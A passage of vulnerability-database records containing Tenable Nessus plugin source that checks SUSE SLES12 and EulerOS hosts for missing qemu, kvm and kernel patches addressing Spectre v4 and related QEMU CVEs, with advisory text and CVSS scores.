script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-curl-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-curl-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-ssh-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-ssh-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-debugsource-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-guest-agent-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-guest-agent-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-lang-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-tools-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-tools-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.6.2-41.43.3\")) flag++;\n\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:23:32", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved to the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2973-1.NASL", "href": "https://www.tenable.com/plugins/nessus/117900", "published": "2018-10-03T00:00:00", "title": "SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-1) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2973-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117900);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-1) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1098735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11806/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12617/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182973-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ea77912\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-2116=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-2116=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-2116=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2018-2116=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"qemu-s390-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"qemu-s390-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-curl-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-curl-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-ssh-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-ssh-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-debugsource-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-guest-agent-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-guest-agent-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-lang-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-tools-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-tools-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-kvm-2.6.2-41.43.3\")) 
flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:05:05", "bulletinFamily": "scanner", "description": "According to the version of the kvm package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of Load & Store instructions (a commonly used\n performance optimization). It relies on the presence of\n a precisely-defined instruction sequence in the\n privileged code as well as the fact that memory read\n from address to which a recent memory write has\n occurred may see an older value and subsequently cause\n an update into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2018-1271.NASL", "href": "https://www.tenable.com/plugins/nessus/117580", "published": "2018-09-18T00:00:00", "title": "EulerOS Virtualization 2.5.0 : kvm (EulerOS-SA-2018-1271)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117580);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/06/28 11:31:59\");\n\n script_cve_id(\n \"CVE-2018-3639\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.0 : kvm (EulerOS-SA-2018-1271)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the kvm package installed, 
the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of Load & Store instructions (a commonly used\n performance optimization). It relies on the presence of\n a precisely-defined instruction sequence in the\n privileged code as well as the fact that memory read\n from address to which a recent memory write has\n occurred may see an older value and subsequently cause\n an update into the microprocessor's data cache even for\n speculatively executed instructions that never actually\n commit (retire). As a result, an unprivileged attacker\n could use this flaw to read privileged memory by\n conducting targeted cache side-channel\n attacks.(CVE-2018-3639)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3b791a80\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kvm package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2018/09/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kvm-4.4.11-421\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kvm\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T02:05:03", "bulletinFamily": "scanner", "description": "According to the version of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of Load & Store instructions (a commonly used\n performance optimization). It relies on the presence of\n a precisely-defined instruction sequence in the\n privileged code as well as the fact that memory read\n from address to which a recent memory write has\n occurred may see an older value and subsequently cause\n an update into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2018-1267.NASL", "href": "https://www.tenable.com/plugins/nessus/117576", "published": "2018-09-18T00:00:00", "title": "EulerOS Virtualization 2.5.1 : kernel (EulerOS-SA-2018-1267)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117576);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/06/28 11:31:59\");\n\n script_cve_id(\n \"CVE-2018-3639\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.1 : kernel (EulerOS-SA-2018-1267)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n 
execution of Load & Store instructions (a commonly used\n performance optimization). It relies on the presence of\n a precisely-defined instruction sequence in the\n privileged code as well as the fact that memory read\n from address to which a recent memory write has\n occurred may see an older value and subsequently cause\n an update into the microprocessor's data cache even for\n speculatively executed instructions that never actually\n commit (retire). As a result, an unprivileged attacker\n could use this flaw to read privileged memory by\n conducting targeted cache side-channel\n attacks.(CVE-2018-3639)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1267\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fb9d2f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10_41\",\n \"kernel-devel-3.10.0-514.44.5.10_41\",\n 
